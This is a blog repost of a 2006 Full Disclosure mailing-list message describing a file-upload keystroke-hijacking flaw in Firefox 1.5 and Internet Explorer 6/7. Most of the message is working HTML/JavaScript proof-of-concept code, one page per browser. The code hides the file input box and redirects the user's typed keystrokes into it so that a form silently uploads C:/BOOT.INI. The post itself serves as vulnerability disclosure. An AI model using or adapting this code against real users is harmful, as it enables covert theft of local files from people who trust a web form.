Charles McAuley在全面揭露安全邮件列表上公布的消息

原创 2006年06月10日 12:31:00
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey all,

aside from the new file upload vulnerability in Firefox 1.5.0.3 and
below, I discovered two others a year ago (one in IE, the other in
Firefox) in the same component.  I'm a little obsessed with the file
input widget.


Since then i've managed to lose my email, but the response I got back
from Microsoft was basically

"Thank you, we'll put it in IE 7.
p.s. you might want to check in with firefox, i think someone reported
this a few years ago and they were vulnerable too.
kthxbye"


The problem is that in both IE and Firefox you can filter the keystrokes
entered in a form and 'bounce' the input over to the file input box, and
then bounce back to previous text entry, making it appear as if nothing
has happened.  Yes this is minor, but a conceivable avenue of attack.

Anyways, my bug (No. 290478) to firefox was marked a dupe of a bug that
dated back to 2000 (No. 56236).  This stuff is publicly
documented/available, but you have to know what your looking for.
Hidden in plain site you could say.

anyways, onto the code:

FIREFOX:
  Instructions:
     Copy paste this into an editor.  Load in firefox. click in text box
on right pane.  type the letter 'c', notice it appear in file input box.
Press the letter 'a', notice it not appear.  press ':', appearrs.
Will filter out the string "c:/boot.ini".

<HTML>
<HEAD>
<style type="text/css">
.first {
}
.second {
        color: white;
        background-color: white;
        opacity: 0;
}
</style>
<SCRIPT>
//document.onKeyDown = doKeyPress;

//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C://BOOT.INI";
//var i=mystring.length-1;
var i=0;
function doKeyPress(chucky)
    {
    saved = chucky.which;
    //alert('pressed ' + String.fromCharCode(saved) + '(' + saved + ')');
    if (mystring[i] != String.fromCharCode(saved).toUpperCase() ||
        i > mystring.length-1) {
       return false;
    }
    i++;
    return true;
  };
function doKeyUp () {

document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();

}

</SCRIPT>
</HEAD>
<BODY >
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="return doKeyPress(event);">
<input name=txt id='txt' type=text value=''
OnKeyDown="document.forms[0].fileupload.focus();"
onClick="">
<input type=button value="invisible"
onclick="document.forms[0].fileupload.className='second';">
<input type=button value="visible"
onclick="document.forms[0].fileupload.className='first';">

</FORM>
</BODY>
</HTML>





INTERNET EXPLORER 6 + 7:
   Description: Same thing as above.
   Instructions: turn on CAPSLOCK (lame). click in text box.  press 'I'.
press 'N', press 'I' press '.'  etc....  will filter out C:/BOOT.INI.

CODE:
<HTML>
<HEAD>
<SCRIPT>
//document.onKeyDown = doKeyPress;

//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C://BOOT.INI";
var i=mystring.length-1;

function doKeyPress () {
e = window.event;
saved = e.keyCode;
window.status = "e.keyCode == " + e.keyCode + "character is " +
mystring.charCodeAt(i);
if(e.keyCode != mystring.charCodeAt(i))
    {
    //e.keyCode =0;
    e.returnValue=false;
    e.cancelBubble=true;
}
else {
    i--;
}
document.forms[0].fileupload.focus();

}

function doKeyUp () {

document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();

}

function switchtype() {
  /*  var e = document.getElementById('txt');
       document.forms[0].txt.setAttribute("type", "file");
       e.setAttribute("value", "asfasfsd");
  */
}

function fux0rKeys() {
   }
</SCRIPT>
</HEAD>
<BODY onload="document.forms[0].txt.value='sometext';
document.forms[0].fileupload.value='asdfsdfadsf';">
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="doKeyPress();">
<input name=txt id='txt' type=text value='asdfsdafasdf'
OnKeyDown="document.forms[0].fileupload.focus();"
asdfnKeyDown="document.forms[0].txt.fireEvent('onKeyPress');"
onClick=""> visible
</FORM>
</BODY>
</HTML>


feel free to shoot any questions at me/the group about it.  I wrote this
stuff over a year ago, and my javascript's never been that good in the
first place.

SOLUTION:
Please please please please please IE and Firefox.  Stop treating the
file input box the way you do.  There can be more imaginative/attractive
ways to displaying a file chooser that have less exposure to attack.

- -chuck
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEhGcQyZFfwQJZqy8RAs1UAKCWVKxkLlUJp9BnBa+6+uG+HfPv6ACeO2oz
qWQEaJxl62PwzKd7c0ziOjg=
=I7HM
-----END PGP SIGNATURE-----
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

拥抱开源,如何关注Linux Kernel 邮件列表?

如今开源如此火爆,以至于张口闭口不提到都仿佛不是搞IT 的,那么如何拥抱开源?本文适合初学者,如有大神至此,goto exit ! 一、如何加入开源 以Linux 为例,这么一个成功的开源...

黑马程序员:实现邮件列表功能的学习。

------------------------------------------------------------------android培训、java培训、期待与您交流!----------...

免费的C/C++学习邮件列表终究靠不住,内容都没有了

几年前,在希网网络上推送的C/C++编程邮件列表内容,好久以来,都不能正常访问了。不付费的资源,终究是靠不住啊,只能从标题中寻找记忆了。 C/C++语言的学习交流、指导提升,就来“C路会”QQ群238...

防止QQ邮件列表退订

  • 2014-09-10 11:00
  • 8.18MB
  • 下载

QQ邮件列表注意

一个简单的PHP邮件列表管理器

1、需求分析 管理员应该能够建立和修改邮件内容。管理员应该能够将文本或HTML格式的新闻信件发送给一个列表中的所有订阅者。用户应该能够通过注册使用一个站点,并且可以进入并修改他们的个人资料。用户应...

邮件列表多线程发送系统

  • 2006-03-16 00:00
  • 400KB
  • 下载

邮件列表的礼仪

原文连接 邮件列表的礼仪 Author: tank 28 一 邮件列表的礼仪 1. 引文风格 用 bottom-posting 或 inlined-posting,不要 top-...

RML&amp;2002邮件列表 v2.02

  • 2004-08-19 15:36
  • 12KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)